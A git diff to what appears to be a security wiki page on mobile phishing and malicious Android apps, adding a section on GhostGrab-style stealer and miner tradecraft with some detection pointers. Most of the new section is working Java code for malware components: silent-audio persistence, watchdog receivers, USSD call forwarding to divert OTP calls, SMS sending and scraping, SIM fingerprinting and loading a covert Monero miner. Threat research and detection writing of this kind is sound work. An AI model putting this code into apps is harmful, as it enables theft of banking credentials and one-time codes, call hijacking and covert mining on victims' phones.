diff --git a/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md b/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md
index 7ca3e849fb4..4244f4bc0e1 100644
--- a/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md
+++ b/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md
@@ -63,6 +63,9 @@
## Useful Frida Snippet: Auto-Bypass Invitation Code
+
+Frida hook to bypass invite-code HTTP check
+
```python
# frida -U -f com.badapp.android -l bypass.js --no-pause
# Hook HttpURLConnection write to always return success
@@ -82,9 +85,11 @@ Java.perform(function() {
});
```
+
+
## Indicators (Generic)
-```
+```text
/req/checkCode.php # invite code validation
/upload.php # batched ZIP exfiltration
LubanCompress 1.1.8 # "Luban" string inside classes.dex
@@ -119,7 +124,7 @@ zipgrep -i "classes|.apk" sample.apk | head
Example (sanitised):
-```
+```text
GET https://rebrand.ly/dclinkto2
Response: https://sqcepo.replit.app/gate.html,https://sqcepo.replit.app/addsm.php
Transform: "gate.html" → "gate.htm" (loaded in WebView)
@@ -222,6 +227,161 @@ public void onMessageReceived(RemoteMessage msg){
---
+## GhostGrab-style Android Stealer + Miner tradecraft (WebView phishing, Firebase C2, foreground audio persistence)
+
+The GhostGrab campaign blends a WebView-based credential stealer with a covert native Monero miner and hard persistence using foreground audio plus watchdog receivers. The following abstractions are reusable patterns to test/detect.
+
+### Sideload + assets/WebView phishing ➜ Firebase Realtime DB exfil
+- Request `REQUEST_INSTALL_PACKAGES` to enable in-app sideloading; optionally `QUERY_ALL_PACKAGES` for discovery.
+- Sequence localised phishing pages under `assets/` in a JS-enabled WebView (e.g., `kyc.html → debit.html → net.html → pass.html → pin.html`).
+- Each page validates input client-side and exfiltrates to Firebase Realtime DB keyed by a device identifier.
+
+Minimal JS exfil to Firebase Realtime DB:
+```html
+
+```
+
+### Foreground audio persistence to defeat Doze/background kills
+- Create a `NotificationChannel` and call `startForeground()` with an innocuous “Audio Playing” notification.
+- Loop a silent `MediaPlayer` to maintain foreground priority and keep the process alive.
+
+
+Minimal foreground audio Service
+
+```java
+public class KeepAliveService extends Service {
+ private MediaPlayer mp;
+ @Override public int onStartCommand(Intent i, int f, int id){
+ String chId = "audio"; NotificationManager nm = getSystemService(NotificationManager.class);
+ if (Build.VERSION.SDK_INT >= 26) {
+ NotificationChannel ch = new NotificationChannel(chId, "Audio", NotificationManager.IMPORTANCE_LOW);
+ nm.createNotificationChannel(ch);
+ }
+ Notification n = new NotificationCompat.Builder(this, chId)
+ .setContentTitle("Audio Playing").setSmallIcon(android.R.drawable.ic_media_play).build();
+ startForeground(1, n);
+ mp = MediaPlayer.create(this, R.raw.silence); mp.setLooping(true); mp.setVolume(0f,0f); mp.start();
+ return START_STICKY;
+ }
+ @Override public void onDestroy(){ try{ if (mp!=null){ mp.stop(); mp.release(); } }catch(Exception ignored){}
+ super.onDestroy(); }
+ @Override public IBinder onBind(Intent i){ return null; }
+}
+```
+
+
+Watchdog and auto-revival:
+- Exported broadcast receivers listen for boot, screen on/off, power/connectivity, package changes, and SMS; on any event they re-launch the core service with `startForegroundService()` and re-arm an `AlarmManager` to check/restart periodically.
+- Request battery-optimization exemption via `ACTION_REQUEST_IGNORE_BATTERY_OPTIMIZATIONS` to reduce throttling.
+
+
+Manifest and watchdog sketch
+
+```xml
+
+
+
+
+
+
+
+
+
+
+
+
+```
+
+```java
+public class MultiEventReceiver extends BroadcastReceiver {
+ @Override public void onReceive(Context c, Intent i){
+ c.startForegroundService(new Intent(c, KeepAliveService.class));
+ AlarmManager am = (AlarmManager) c.getSystemService(Context.ALARM_SERVICE);
+ PendingIntent p = PendingIntent.getService(c,0,new Intent(c,KeepAliveService.class),PendingIntent.FLAG_IMMUTABLE);
+ am.setExactAndAllowWhileIdle(AlarmManager.ELAPSED_REALTIME_WAKEUP, SystemClock.elapsedRealtime()+60_000, p);
+ }
+}
+```
+
+
+### Firebase as covert C2 with push and DB-backed tasks
+- Register to FCM to obtain a device token. Use Realtime DB collections like `clients/` and `repository` to store telemetry and captured SMS.
+- Implement simple C2 commands by writing control objects; client polls/listens and executes.
+
+Example telephony/SMS commands:
+- `callForward` — enable `**21*#` and disable `##21#` via USSD to divert calls/voice OTPs.
+- `sendSms` — send arbitrary SMS from a selected SIM slot.
+- `forwardSms` — forward all incoming SMS to an operator number, with deduplication state.
+
+Code sketches:
+```java
+// Call forwarding via USSD (requires CALL_PHONE)
+String code = "**21*"+number+"#";
+Intent ussd = new Intent(Intent.ACTION_CALL, Uri.parse("tel:"+Uri.encode(code)));
+// Optional: pick SIM by PhoneAccountHandle for slot index
+startActivity(ussd);
+
+// Send SMS from a specific SIM
+SmsManager mgr = SmsManager.getSmsManagerForSubscriptionId(subId);
+mgr.sendTextMessage(to, null, message, null, null);
+```
+
+### SMS scraping and SIM profiling
+- Keyword-based harvesting from `content://sms/` and bulk upload of the last N messages with metadata.
+- Combine `SubscriptionManager` and `TelephonyManager` to fingerprint SIMs and carriers.
+
+```java
+Cursor c = getContentResolver().query(Uri.parse("content://sms/"),
+ new String[]{"_id","address","body","date","type"}, null, null, "date DESC");
+int n=0; while(c!=null && c.moveToNext() && n++<50){ /* collect rows */ }
+
+List subs = SubscriptionManager.from(ctx).getActiveSubscriptionInfoList();
+for (SubscriptionInfo si: subs){ int slot = si.getSimSlotIndex(); String num = si.getNumber(); String carrier = String.valueOf(si.getCarrierName()); }
+```
+
+### Launcher/icon hiding
+- Conceal launcher presence by omitting `CATEGORY.LAUNCHER`; use a benign category instead. Services run from receivers and foreground service.
+
+```xml
+
+
+
+
+```
+
+### Covert mobile crypto-mining
+- On device-lock or specific triggers, fetch an encrypted native miner (e.g., `libmine-arm64.so`) into a private dir (e.g., `d-miner/`).
+- Decrypt and load the library; start a native mining thread with TLS and Monero flags against attacker pools. Use a worker-id derived at runtime.
+
+```java
+System.load(new File(getFilesDir(), "d-miner/libmine-arm64.so").getAbsolutePath());
+startMiner(new String[]{"--tls","--coin","monero","--no-color","--nicehash",
+ "-o","pool.example.org:9000","-u","","-k","-p","x"});
+```
+
+Hunting pointers:
+- Foreground notification titled "Audio Playing" with a looping, muted `MediaPlayer` in an unknown app.
+- Exported receivers that relaunch a foreground service on many system broadcasts; recurring `AlarmManager` wakeups.
+- FCM + Firebase DB used together by an untrusted app; keys like `clients/`, `repository`, and commands `callForward|sendSms|forwardSms`.
+- USSD dial attempts containing `**21*` or `##21#` shortly after install.
+- Monero pools and hardcoded wallet in code/strings; native `.so` miner dropped under app-private paths.
+
+---
+
## Socket.IO/WebSocket-based APK Smuggling + Fake Google Play Pages
Attackers increasingly replace static APK links with a Socket.IO/WebSocket channel embedded in Google Play–looking lures. This conceals the payload URL, bypasses URL/extension filters, and preserves a realistic install UX.
@@ -274,6 +434,9 @@ Attackers present a WebView pointing to an attacker page and inject a JavaScript
Minimal pattern:
+
+DropperActivity: WebView to PackageInstaller bridge
+
```java
public class DropperActivity extends Activity {
@Override protected void onCreate(Bundle b){
@@ -303,6 +466,8 @@ public class DropperActivity extends Activity {
}
```
+
+
HTML on the page:
```html
@@ -440,5 +605,6 @@ Background: [NFSkate NFC relay](https://www.threatfabric.com/blogs/ghost-tap-new
- [Banker Trojan Targeting Indonesian and Vietnamese Android Users (DomainTools)](https://dti.domaintools.com/banker-trojan-targeting-indonesian-and-vietnamese-android-users/)
- [DomainTools SecuritySnacks – ID/VN Banker Trojans (IOCs)](https://github.com/DomainTools/SecuritySnacks/blob/main/2025/BankerTrojan-ID-VN)
- [Socket.IO](https://socket.io)
+- [GhostGrab Android Malware: Hybrid Banking Stealer and Monero Miner (CYFIRMA)](https://www.cyfirma.com/research/ghostgrab-android-malware/)
-{{#include ../../banners/hacktricks-training.md}}
+{{#include ../../banners/hacktricks-training.md}}
\ No newline at end of file